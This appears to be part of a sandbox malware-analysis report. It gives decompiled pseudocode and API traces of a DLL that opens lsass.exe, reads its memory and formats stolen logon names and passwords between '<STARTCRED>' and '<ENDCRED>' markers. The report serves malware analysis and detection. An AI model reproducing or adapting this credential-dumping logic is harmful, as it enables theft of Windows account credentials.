    						_t119 =  *0x1001f2f8; // 0x1001a788
    						_t31 = _t119 + 0x10; // 0x1001d81c
    						 *((intOrPtr*)( *((intOrPtr*)( *_t31))))( *((intOrPtr*)(__ecx + 4)),  *(__ecx + 2) & 0x0000ffff);
    					}
    					_push( *((intOrPtr*)(_t161 + 4)));
    					goto L56;
    				} else {
    					_t159 =  *((intOrPtr*)(__ecx + 4));
    					_t93 = _t131 & 0x07000000;
    					_v28 = _t93;
    					if(_t159 != 0) {
    						if(_t93 == 0x1000000) {
    							_t124 = E10013630( *_v20);
    							_t155 =  *_t124;
    							_t145 =  *((intOrPtr*)(_t155 + _t159 + 4));
    							if(_t145 != 0) {
    								 *((intOrPtr*)(_t155 + _t159 + 4)) = _t145 + _t159;
    							}
    							_t146 =  *((intOrPtr*)(_t124 + 4));
    							_t93 =  *(_t146 + _t159 + 4);
    							if(_t93 != 0) {
    								_t93 = _t93 + _t159;
    								 *(_t146 + _t159 + 4) = _t93;
    							}
    						}
    					}
    					L57:
    					if((_t131 & 0x00000002) != 0) {
    						_t93 = _v24;
    						if(_t93 != 0) {
    							_t93 = LocalFree(_t93);
    						}
    					}
    					goto L60;
    				}
    			}

    APIs
    • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 10011D86
      • Part of subcall function 10014BD0: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,10011EEC), ref: 10014C18
      • Part of subcall function 10014DA0: IsCharAlphaNumericW.USER32(?), ref: 10014DB9
      • Part of subcall function 10014DA0: IsTextUnicode.ADVAPI32(?,00000002,00000002), ref: 10014DCF
      • Part of subcall function 10014340: LocalAlloc.KERNEL32(00000040,000001FE,?,?,?,?,?,10011FEA,%ls%wZ\%wZ%ls%wZ%ls%ls,<STARTCRED>,?,?,<STARTPASS>,?,<ENDCRED>,1001DCC4), ref: 10014374
      • Part of subcall function 10014340: LocalAlloc.KERNEL32(00000040,000000FE), ref: 100143E1
      • Part of subcall function 10014340: LocalFree.KERNEL32(000D1378), ref: 10014403
    • LocalFree.KERNEL32(?), ref: 10011FFE
    • LocalFree.KERNEL32(?), ref: 1001200B
    • LocalFree.KERNEL32(?), ref: 10012018
    • LocalFree.KERNEL32(?), ref: 1001202C
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 100%
    			E10012980(intOrPtr* __ecx, void* __edx) {
    				void* _t57;
    				void* _t59;
    				void _t64;
    				intOrPtr _t66;
    				void _t69;
    				void* _t75;
    				int _t78;
    				LONG* _t79;
    				void* _t85;
    				void* _t87;
    				void* _t88;
    				int _t90;
    				void* _t100;
    				void* _t103;
    				void _t104;
    				void* _t109;
    				intOrPtr* _t110;
    				int _t117;
    				long _t120;
    				intOrPtr* _t124;
    				intOrPtr* _t125;
    				void* _t126;
    				void* _t127;
    
    				_t100 = __edx;
    				 *(_t126 + 0x20) = 0x1001f2d0;
    				_t124 = __ecx;
    				 *(_t126 + 0x28) = 0;
    				 *((intOrPtr*)(_t126 + 0x1c)) = __ecx;
    				_t120 = __edx + 8;
    				 *(_t126 + 0x20) = _t126 + 0x14;
    				 *(_t126 + 0x34) = 0x1001f2d0;
    				_t57 = LocalAlloc(0x40, _t120);
    				 *(_t126 + 0x28) = _t57;
    				if(_t57 == 0) {
    					return 0;
    				} else {
    					_t59 = E10014010(_t126 + 0x24, _t124, 4);
    					_t127 = _t126 + 4;
    					if(_t59 == 0) {
    						L33:
    						_t103 =  *(_t127 + 0x28);
    						goto L34;
    					} else {
    						_t104 =  *(_t127 + 0x14);
    						 *(_t127 + 0x20) = _t104;
    						 *((intOrPtr*)(_t127 + 0x24)) =  *((intOrPtr*)(_t124 + 4));
    						if(_t104 ==  *_t124) {
    							goto L33;
    						} else {
    							_t125 =  *((intOrPtr*)(_t127 + 0x3c));
    							_t103 =  *(_t127 + 0x28);
    							do {
    								_t109 =  *(_t127 + 0x2c);
    								_t117 = 0;
    								 *(_t127 + 0x30) = 0;
    								 *(_t127 + 0x34) = 0x1001f2d0;
    								_t64 =  *_t109;
    								if(_t64 == 0) {
    									_t110 =  *((intOrPtr*)(_t127 + 0x24));
    									_t66 =  *_t110;
    									if(_t66 == 0) {
    										E10010340(_t103,  *((intOrPtr*)(_t127 + 0x24)), _t120);
    										_t103 =  *(_t127 + 0x34);
    										_t127 = _t127 + 0xc;
    										goto L28;
    									} else {
    										_t75 = _t66 - 1;
    										if(_t75 == 0) {
    											_t78 = ReadProcessMemory( *( *( *((intOrPtr*)(_t127 + 0x24)) + 4)),  *(_t127 + 0x2c), _t103, _t120, 0);
    											goto L23;
    										} else {
    											_t79 = _t75 - 5;
    											if(_t79 != 0) {
    												goto L25;
    											} else {
    												if(SetFilePointer( *( *(_t110 + 4)),  *(_t127 + 0x28), _t79, _t79) == 0xffffffff) {
    													goto L33;
    												} else {
    													_t78 = ReadFile( *( *( *(_t127 + 0x2c) + 4)),  *(_t127 + 0x34), _t120, _t127 + 0x1c, 0);
    													goto L23;
    												}
    											}
    										}
    									}
    								} else {
    									_t85 = _t64 - 1;
    									if(_t85 == 0) {
    										if( *((intOrPtr*)( *((intOrPtr*)(_t127 + 0x24)))) != 0) {
    											goto L13;
    										} else {
    											_t78 = WriteProcessMemory( *( *( *(_t127 + 0x2c) + 4)), _t103,  *(_t127 + 0x28), _t120, 0);
    											goto L23;
    										}
    									} else {
    										if(_t85 != 5) {
    											L25:
    											if(_t117 == 0) {
    												L34:
    												LocalFree(_t103);
    												return 0;
    											} else {
    												L28:
    												if( *_t125 !=  *((intOrPtr*)(_t103 + _t100))) {
    													goto L30;
    												} else {
    													_t51 = _t100 + 4; // 0x0
    													if( *((intOrPtr*)(_t125 + 4)) ==  *((intOrPtr*)(_t103 + _t51))) {
    														LocalFree(_t103);
    														return  *(_t127 + 0x20);
    													} else {
    														goto L30;
    													}
    												}
    											}
    										} else {
    											if( *((intOrPtr*)( *((intOrPtr*)(_t127 + 0x24)))) != 0) {
    												L13:
    												_t87 = LocalAlloc(0x40, _t120);
    												 *(_t127 + 0x30) = _t87;
    												if(_t87 == 0) {
    													goto L33;
    												} else {
    													_t88 = E10014010(_t127 + 0x34, _t127 + 0x24, _t120);
    													_t127 = _t127 + 4;
    													if(_t88 != 0) {
    														_t90 = E10014010(_t127 + 0x2c, _t127 + 0x34, _t120);
    														_t127 = _t127 + 4;
    														_t117 = _t90;
    													}
    													LocalFree( *(_t127 + 0x30));
    													goto L24;
    												}
    											} else {
    												if(_t103 == 0 || SetFilePointer( *( *(_t109 + 4)), _t103, 0, 0) != 0) {
    													_t24 =  *(_t127 + 0x34) + 4; // 0x0
    													_t78 = WriteFile( *( *_t24),  *(_t127 + 0x2c), _t120, _t127 + 0x1c, 0);
    													L23:
    													_t117 = _t78;
    													L24:
    													_t103 =  *(_t127 + 0x28);
    													goto L25;
    												} else {
    													goto L33;
    												}
    											}
    										}
    									}
    								}
    								goto L36;
    								L30:
    								_t69 =  *_t103;
    								 *(_t127 + 0x20) = _t69;
    							} while (_t69 !=  *( *(_t127 + 0x1c)));
    							LocalFree(_t103);
    							return 0;
    						}
    					}
    				}
    				L36:
    			}

    APIs
    • LocalAlloc.KERNEL32(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100129B5
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • SetFilePointer.KERNEL32(00000006,?,00000000,00000000), ref: 10012A3E
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10012A61
    • WriteProcessMemory.KERNEL32(00000006,?,?,?,00000000), ref: 10012A85
    • LocalAlloc.KERNEL32(00000040,?), ref: 10012A93
    • LocalFree.KERNEL32(?), ref: 10012AD1
    • SetFilePointer.KERNEL32(00000006,?,?,?), ref: 10012AF9
    • ReadFile.KERNEL32(00000006,1001F2D0,?,?,00000000), ref: 10012B1D
    • ReadProcessMemory.KERNEL32(00000006,?,?,?,00000000), ref: 10012B36
    • LocalFree.KERNEL32(1001F2D0), ref: 10012B80
    • LocalFree.KERNEL32(1001F2D0), ref: 10012B95
    • LocalFree.KERNEL32(?), ref: 10012BAC
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 73%
    			E100139B0(intOrPtr* _a4) {
    				intOrPtr _v8;
    				void* _v12;
    				intOrPtr _v16;
    				void* _v20;
    				char _v28;
    				void _v32;
    				intOrPtr _v40;
    				intOrPtr _v48;
    				void* _t39;
    				void* _t40;
    				intOrPtr _t52;
    				void* _t56;
    				intOrPtr* _t61;
    				short* _t63;
    				short* _t71;
    				intOrPtr _t78;
    				intOrPtr _t79;
    				intOrPtr _t80;
    				short* _t84;
    				intOrPtr _t86;
    				long _t87;
    				intOrPtr _t89;
    				void* _t90;
    				intOrPtr _t91;
    				signed int _t92;
    				void* _t94;
    
    				_t94 = (_t92 & 0xfffffff8) - 0x1c;
    				_t61 = _a4;
    				_v12 = 0;
    				_v8 = 0x1001f2d0;
    				_t64 =  *_t61;
    				_v20 = 0;
    				_v16 =  *((intOrPtr*)( *_t61));
    				if( *0x1001e578 != 0) {
    					L2:
    					_t86 =  *0x1001f2c8; // 0x20
    					_t39 =  *0x1001f2cc; // 0x74ba7188
    					_push( *((intOrPtr*)(_t61 + 8)));
    					_v20 = _t39;
    					_t87 = _t86 + 0x18;
    					_t40 = E10012980( &_v20, 0x10);
    					_v20 = _t40;
    					if(_t40 == 0) {
    						L26:
    						return _t40;
    					}
    					_t40 = LocalAlloc(0x40, _t87);
    					_v12 = _t40;
    					if(_t40 == 0) {
    						goto L26;
    					}
    					if(E10014010( &_v12,  &_v20, _t87) == 0) {
    						L25:
    						_t40 = LocalFree(_v12);
    						goto L26;
    					}
    					_t89 =  *0x1001f2c8; // 0x20
    					_t63 = 0;
    					_t84 = 0;
    					_v32 = 0;
    					_v28 = 0;
    					_t90 = _t89 + _v12;
    					if(_t90 == 0) {
    						goto L25;
    					}
    					 *0x1001f3a4( *((intOrPtr*)(_a4 + 0x20)),  &_v28);
    					if( *((intOrPtr*)(_t90 + 4)) != 0 ||  *((intOrPtr*)(_t90 + 0xc)) != 0 ||  *((intOrPtr*)(_t90 + 0x14)) != 0) {
    						_t78 =  *0x1001f294; // 0xcaa50
    						if(E10014BD0(_t90, _t78) != 0) {
    							E10014DA0();
    							_t63 =  !=  ? _t90 : _t63;
    						}
    						_t79 =  *0x1001f294; // 0xcaa50
    						_v32 = _t90 + 8;
    						if(E10014BD0(_t90 + 8, _t79) != 0) {
    							E10014DA0();
    							_t74 =  !=  ? _v32 : 0;
    							_v40 =  !=  ? _v32 : 0;
    						}
    						_t80 =  *0x1001f294; // 0xcaa50
    						if(E10014BD0(_t90 + 0x10, _t80) == 0) {
    							L18:
    							_t91 = _v40;
    							goto L19;
    						} else {
    							_t52 =  *0x1001f2f8; // 0x1001a788
    							_t28 = _t52 + 0x10; // 0x1001d81c
    							 *((intOrPtr*)( *((intOrPtr*)( *_t28))))( *((intOrPtr*)(_t90 + 0x14)),  *(_t90 + 0x12) & 0x0000ffff);
    							_t84 = _t90 + 0x10;
    							if(_t84 == 0) {
    								goto L18;
    							}
    							_t71 = _t84;
    							_t56 = E10014DA0();
    							_t91 = _v48;
    							if(_t56 != 0 &&  *_t84 <= 0x20) {
    								_push("\n");
    								_push(L"<ENDCRED>");
    								_push(_t84);
    								_push(L"<STARTPASS>");
    								_push(_t63);
    								_push(_t91);
    								E10014340(_t71, L"%ls%wZ\\%wZ%ls%wZ%ls%ls", L"<STARTCRED>");
    							}
    							L19:
    							if(_t63 != 0) {
    								LocalFree( *(_t63 + 4));
    							}
    							if(_t91 != 0) {
    								LocalFree( *(_t91 + 4));
    							}
    							if(_t84 != 0) {
    								LocalFree( *(_t84 + 4));
    							}
    							goto L25;
    						}
    					} else {
    						goto L25;
    					}
    				}
    				_push(0x1001f2c8);
    				_t40 = E10012BD0(_t64, 0x1001e560, 0x1001e5b0, 5, 0x1001f2cc, 0, _t64);
    				_t94 = _t94 + 0x18;
    				if(_t40 == 0) {
    					goto L26;
    				}
    				goto L2;
    			}

    APIs
      • Part of subcall function 10012980: LocalAlloc.KERNEL32(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 100129B5
      • Part of subcall function 10012980: SetFilePointer.KERNEL32(00000006,?,00000000,00000000), ref: 10012A3E
      • Part of subcall function 10012980: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10012A61
      • Part of subcall function 10012980: WriteProcessMemory.KERNEL32(00000006,?,?,?,00000000), ref: 10012A85
      • Part of subcall function 10012980: LocalAlloc.KERNEL32(00000040,?), ref: 10012A93
      • Part of subcall function 10012980: LocalFree.KERNEL32(?), ref: 10012AD1
      • Part of subcall function 10012980: SetFilePointer.KERNEL32(00000006,?,?,?), ref: 10012AF9
      • Part of subcall function 10012980: ReadFile.KERNEL32(00000006,1001F2D0,?,?,00000000), ref: 10012B1D
      • Part of subcall function 10012980: ReadProcessMemory.KERNEL32(00000006,?,?,?,00000000), ref: 10012B36
      • Part of subcall function 10012980: LocalFree.KERNEL32(1001F2D0), ref: 10012B80
      • Part of subcall function 10012980: LocalFree.KERNEL32(1001F2D0), ref: 10012B95
      • Part of subcall function 10012980: LocalFree.KERNEL32(?), ref: 10012BAC
    • LocalAlloc.KERNEL32(00000040,00000008), ref: 10013A46
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 10013A98
      • Part of subcall function 10014BD0: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,10011EEC), ref: 10014C18
    • LocalFree.KERNEL32(?), ref: 10013B88
      • Part of subcall function 10014DA0: IsCharAlphaNumericW.USER32(?), ref: 10014DB9
      • Part of subcall function 10014DA0: IsTextUnicode.ADVAPI32(?,00000002,00000002), ref: 10014DCF
      • Part of subcall function 10014340: LocalAlloc.KERNEL32(00000040,000001FE,?,?,?,?,?,10011FEA,%ls%wZ\%wZ%ls%wZ%ls%ls,<STARTCRED>,?,?,<STARTPASS>,?,<ENDCRED>,1001DCC4), ref: 10014374
      • Part of subcall function 10014340: LocalAlloc.KERNEL32(00000040,000000FE), ref: 100143E1
      • Part of subcall function 10014340: LocalFree.KERNEL32(000D1378), ref: 10014403
    • LocalFree.KERNEL32(?), ref: 10013B6E
    • LocalFree.KERNEL32(?), ref: 10013B7B
    • LocalFree.KERNEL32(?), ref: 10013B92
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 100%
    			E100120C0(void* __edx, void* __eflags) {
    				void* _v8;
    				void* _v12;
    				intOrPtr _v16;
    				void* _v20;
    				void* _v24;
    				void* _v28;
    				intOrPtr _v32;
    				void* _v36;
    				void* _v40;
    				void* _v44;
    				intOrPtr _v48;
    				void* _v52;
    				void* _v56;
    				void* _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				intOrPtr _v76;
    				void* _v80;
    				intOrPtr _v84;
    				intOrPtr _v88;
    				intOrPtr _v92;
    				intOrPtr _v96;
    				intOrPtr _v100;
    				intOrPtr _v104;
    				intOrPtr _v108;
    				char _v112;
    				void** _v116;
    				void* _v120;
    				void** _v124;
    				void* _v128;
    				void** _v132;
    				void* _v136;
    				char _v140;
    				void** _v144;
    				signed char* _v148;
    				intOrPtr _v152;
    				char _v156;
    				intOrPtr _v160;
    				intOrPtr _v164;
    				void* _v168;
    				intOrPtr _v172;
    				char _v176;
    				char _v180;
    				intOrPtr _v184;
    				void _v188;
    				signed int _v189;
    				intOrPtr _t145;
    				intOrPtr _t146;
    				intOrPtr _t147;
    				intOrPtr _t149;
    				char _t150;
    				intOrPtr _t152;
    				void* _t155;
    				void* _t157;
    				void* _t160;
    				intOrPtr _t180;
    				intOrPtr _t182;
    				intOrPtr _t184;
    				intOrPtr _t189;
    				void* _t190;
    				void* _t194;
    				void* _t196;
    				void* _t197;
    				void _t199;
    				void* _t205;
    				long _t207;
    				void* _t208;
    				long _t211;
    				void* _t212;
    				long _t215;
    				void* _t216;
    				signed int _t220;
    				intOrPtr _t221;
    				void _t223;
    				long _t225;
    				void* _t226;
    				void* _t227;
    				void* _t228;
    				void* _t231;
    				void* _t241;
    				long* _t249;
    				intOrPtr _t250;
    				intOrPtr _t252;
    				intOrPtr _t253;
    				intOrPtr _t254;
    				void* _t256;
    				void* _t257;
    
    				_v180 = 1;
    				_t256 = __edx;
    				_v188 =  &_v180;
    				_v184 = 0x1001f2d0;
    				_t250 = 1;
    				_v168 = 0;
    				_v164 = 0x1001f2d0;
    				_t145 = E100125F0();
    				_t221 = _t145;
    				_v160 = _t221;
    				if(_t221 < 0) {
    					return _t145;
    				} else {
    					_t146 =  *0x1001f2f8; // 0x1001a788
    					_v108 = _t146;
    					_t147 =  *0x1001f2a0; // 0x1db1
    					_v112 = 0x1001f294;
    					if(_t147 >= 0xbb8) {
    						if(_t147 >= 0x1388) {
    							if(_t147 >= 0x1b58) {
    								if(_t147 >= 0x1f40) {
    									_t249 =  >=  ? 0x1001a8c8 : 0x1001a89c;
    								} else {
    									_t249 = 0x1001a844;
    								}
    							} else {
    								_t249 = 0x1001a818;
    							}
    						} else {
    							_t249 = 0x1001a7ec;
    						}
    					} else {
    						_t249 = 0x1001a7c0;
    					}
    					if(_t147 + 0xffffe4a8 <= 0x95f &&  *0x1001e318 > 0x53480000) {
    						_t249 =  &(_t249[0xb]);
    					}
    					_t149 =  *0x1001f294; // 0xcaa50
    					_v172 = _t149;
    					_t150 =  *0x1001f2a8; // 0x7516e4a4
    					_v176 = _t150;
    					if(_t150 != 0) {
    						E10014010( &_v188,  &_v176, 4);
    						_t221 = _v160;
    						_t257 = _t257 + 4;
    					}
    					_t220 = 0;
    					if(_v180 <= 0) {
    						return _t221;
    					}
    					do {
    						_t152 =  *0x1001f2ac; // 0x751702f8
    						_v184 = 0x1001f2d0;
    						_v176 = _t152 + _t220 * 8;
    						_v188 =  &_v140;
    						_t155 = LocalAlloc(0x40,  *_t249);
    						_v168 = _t155;
    						if(_t155 != 0) {
    							_t157 = E10014010( &_v188,  &_v176, 4);
    							_t257 = _t257 + 4;
    							if(_t157 != 0) {
    								_t223 = _v140;
    								_v188 = _t223;
    								_v184 = _v172;
    								if(_t223 != _v176) {
    									while(_t250 != 0) {
    										_t160 = E10014010( &_v168,  &_v188,  *_t249);
    										_t257 = _t257 + 4;
    										if(_t160 != 0) {
    											_t241 = _v168;
    											_t33 =  &(_t249[1]); // 0x40
    											_t34 =  &(_t249[4]); // 0x50
    											_v104 =  *_t33 + _t241;
    											_t252 =  *_t34 + _t241;
    											_t36 =  &(_t249[2]); // 0x74
    											_t37 =  &(_t249[9]); // 0x80
    											_t225 =  *_t37;
    											_v60 = 0;
    											_v56 = 0;
    											_v92 =  *((intOrPtr*)(_t241 +  *_t36));
    											_t42 =  &(_t249[3]); // 0x7c
    											_v136 = 0;
    											_v88 =  *((intOrPtr*)(_t241 +  *_t42));
    											_t46 =  &(_t249[5]); // 0x58
    											_v100 = _t252;
    											_v96 =  *_t46 + _t241;
    											_t49 =  &(_t249[6]); // 0x90
    											_v84 =  *((intOrPtr*)(_t241 +  *_t49));
    											_t52 =  &(_t249[7]); // 0x70
    											_v80 =  *((intOrPtr*)(_t241 +  *_t52));
    											_t55 =  &(_t249[8]); // 0xc0
    											_v76 =  *((intOrPtr*)(_t241 +  *_t55));
    											_v72 =  *((intOrPtr*)(_t225 + _t241));
    											_v68 =  *((intOrPtr*)(_t225 + _t241 + 4));
    											_t63 =  &(_t249[0xa]); // 0x88
    											_v64 =  *_t63 + _t241;
    											_t226 =  *(_t252 + 4);
    											_v132 =  &_v60;
    											_t180 =  *0x1001f294; // 0xcaa50
    											_v52 = _t226;
    											_v48 = _t180;
    											 *(_t252 + 4) = 0;
    											if(_t226 != 0) {
    												_t215 =  *(_t252 + 2) & 0x0000ffff;
    												if(_t215 != 0) {
    													_t216 = LocalAlloc(0x40, _t215);
    													_v136 = _t216;
    													if(_t216 != 0) {
    														 *(_t252 + 4) = _t216;
    														E10014010( &_v136,  &_v52,  *(_t252 + 2) & 0x0000ffff);
    														_t257 = _t257 + 4;
    													}
    												}
    											}
    											_t253 = _v96;
    											_v124 =  &_v44;
    											_t182 =  *0x1001f294; // 0xcaa50
    											_v44 = 0;
    											_t227 =  *(_t253 + 4);
    											_v40 = 0;
    											_v128 = 0;
    											_v36 = _t227;
    											_v32 = _t182;
    											 *(_t253 + 4) = 0;
    											if(_t227 != 0) {
    												_t211 =  *(_t253 + 2) & 0x0000ffff;
    												if(_t211 != 0) {
    													_t212 = LocalAlloc(0x40, _t211);
    													_v128 = _t212;
    													if(_t212 != 0) {
    														 *(_t253 + 4) = _t212;
    														E10014010( &_v128,  &_v36,  *(_t253 + 2) & 0x0000ffff);
    														_t257 = _t257 + 4;
    													}
    												}
    											}
    											_t254 = _v64;
    											_v116 =  &_v28;
    											_t184 =  *0x1001f294; // 0xcaa50
    											_v28 = 0;
    											_t228 =  *(_t254 + 4);
    											_v24 = 0;
    											_v120 = 0;
    											_v20 = _t228;
    											_v16 = _t184;
    											 *(_t254 + 4) = 0;
    											if(_t228 != 0) {
    												_t207 =  *(_t254 + 2) & 0x0000ffff;
    												if(_t207 != 0) {
    													_t208 = LocalAlloc(0x40, _t207);
    													_v120 = _t208;
    													if(_t208 != 0) {
    														 *(_t254 + 4) = _t208;
    														E10014010( &_v120,  &_v20,  *(_t254 + 2) & 0x0000ffff);
    														_t257 = _t257 + 4;
    													}
    												}
    											}
    											_v12 = 0;
    											_v148 =  &_v189;
    											_v8 = 0;
    											_v144 =  &_v12;
    											_v80 = 0;
    											_v156 = _v80 + 1;
    											_t189 =  *0x1001f294; // 0xcaa50
    											_v152 = _t189;
    											_t190 = E10014010( &_v148,  &_v156, 1);
    											_t257 = _t257 + 4;
    											if(_t190 != 0) {
    												_v156 = _v156 - 1;
    												_t255 = 8 + (_v189 & 0x000000ff) * 4;
    												_t205 = LocalAlloc(0x40, 8 + (_v189 & 0x000000ff) * 4);
    												_v148 = _t205;
    												if(_t205 != 0) {
    													_v80 = _t205;
    													E10014010( &_v148,  &_v156, _t255);
    													_t257 = _t257 + 4;
    												}
    											}
    											_t250 = E10012060( &_v112, _t256);
    											_t231 =  *(_v108 + 4);
    											if(_t231 != 0) {
    												LocalFree(_t231);
    											}
    											_t194 =  *(_v96 + 4);
    											if(_t194 != 0) {
    												LocalFree(_t194);
    											}
    											_t196 =  *(_v64 + 4);
    											if(_t196 != 0) {
    												LocalFree(_t196);
    											}
    											_t197 = _v80;
    											if(_t197 != 0) {
    												LocalFree(_t197);
    											}
    											_t199 =  *_v168;
    											_v188 = _t199;
    											if(_t199 != _v176) {
    												continue;
    											}
    										}
    										goto L46;
    									}
    								}
    							}
    							L46:
    							LocalFree(_v168);
    						}
    						_t220 = _t220 + 1;
    					} while (_t220 < _v180);
    					return _v160;
    				}
    			}

    APIs
      • Part of subcall function 100125F0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10012650
      • Part of subcall function 100125F0: RtlInitUnicodeString.NTDLL(?,lsass.exe), ref: 1001267B
      • Part of subcall function 100125F0: OpenProcess.KERNEL32(-00000FFF,00000000,?,?,00000001,?), ref: 100126A3
      • Part of subcall function 100125F0: GetCurrentProcess.KERNEL32(?), ref: 100126DD
      • Part of subcall function 100125F0: IsWow64Process.KERNEL32(00000000), ref: 100126E4
      • Part of subcall function 100125F0: CloseHandle.KERNEL32(00000000), ref: 100127C3
    • LocalAlloc.KERNEL32(00000040,1001A89C), ref: 100121E0
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10014059
      • Part of subcall function 10014010: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1001407C
      • Part of subcall function 10014010: WriteProcessMemory.KERNEL32(?,1001F2D0,?,?,00000000), ref: 100140A2
      • Part of subcall function 10014010: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,10014919,000CAA50), ref: 100140B9
      • Part of subcall function 10014010: LocalFree.KERNEL32(?,10012590), ref: 100140F3
      • Part of subcall function 10014010: SetFilePointer.KERNEL32(?,?,?,?), ref: 10014120
      • Part of subcall function 10014010: ReadFile.KERNEL32(?,1001F2D0,?,?,00000000), ref: 10014140
      • Part of subcall function 10014010: ReadProcessMemory.KERNELBASE(?,?,1001F2D0,?,00000000), ref: 1001415F
    • LocalAlloc.KERNEL32(00000040,?), ref: 1001231C
    • LocalAlloc.KERNEL32(00000040,?), ref: 1001239F
    • LocalAlloc.KERNEL32(00000040,?), ref: 10012425
    • LocalAlloc.KERNEL32(00000040,?), ref: 100124C0
    • LocalFree.KERNEL32(00000000,?,?), ref: 100124FF
    • LocalFree.KERNEL32(00000000,?,?), ref: 10012511
    • LocalFree.KERNEL32(00000000,?,?), ref: 10012526
    • LocalFree.KERNEL32(?,?,?), ref: 10012538
    • LocalFree.KERNEL32(?), ref: 10012556
    Memory Dump Source
    • Source File: 00000003.00000002.1560697758.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.1560691498.10000000.00000040.sdmp
    • Associated: 00000003.00000002.1560720748.10015000.00000002.sdmp
    • Associated: 00000003.00000002.1560736135.1001D000.00000004.sdmp
    • Associated: 00000003.00000002.1560746871.10020000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_ucngw.jbxd
    C-Code - Quality: 63%
    			E100125F0() {
    				struct _SECURITY_ATTRIBUTES* _v8;
    				char* _v12;
    				intOrPtr _v16;
    				void* _v24;
    				char _v28;
    				struct _SECURITY_ATTRIBUTES* _v32;
    				long _v36;
    				char _v40;
    				intOrPtr _v48;
    				intOrPtr* _t17;
    				WCHAR* _t21;
    				void* _t27;
    				char _t29;
    				intOrPtr _t33;
    				void* _t37;
    				void* _t38;
    				intOrPtr _t39;
    				int _t40;
    				intOrPtr _t44;
    				void* _t47;
    				signed int _t48;
    				long _t51;
    				intOrPtr _t52;
    				long _t53;
    				void* _t59;
    
    				_t47 = 0;
    				_v32 = 0;
    				asm("sbb esi, esi");
    				_t51 = (_t48 & 0xfffff400) + 0x00001000 | 0x00000010;
    				_t59 =  *0x1001f294 - _t47; // 0xcaa50
    				if(_t59 != 0) {
    					return 0;
    				} else {
    					_t17 =  *0x1001f2f8; // 0x1001a788
    					_t38 = 0xc0000225;
    					if( *((intOrPtr*)( *_t17))() >= 0) {
    						_t21 =  *0x1001f2a4; // 0x0
    						if(_t21 == 0) {
    							_v8 = 0;
    							_v16 =  &_v24;
    							_t53 = 1;
    							_v12 =  &_v28;
    							RtlInitUnicodeString( &_v24, L"lsass.exe");
    							if(E10014760( &_v24) < 0 || _v16 == 0) {
    								goto L23;
    							} else {
    								_t27 = OpenProcess(_t51, 0, _v36);
    								goto L7;
    							}
    						} else {
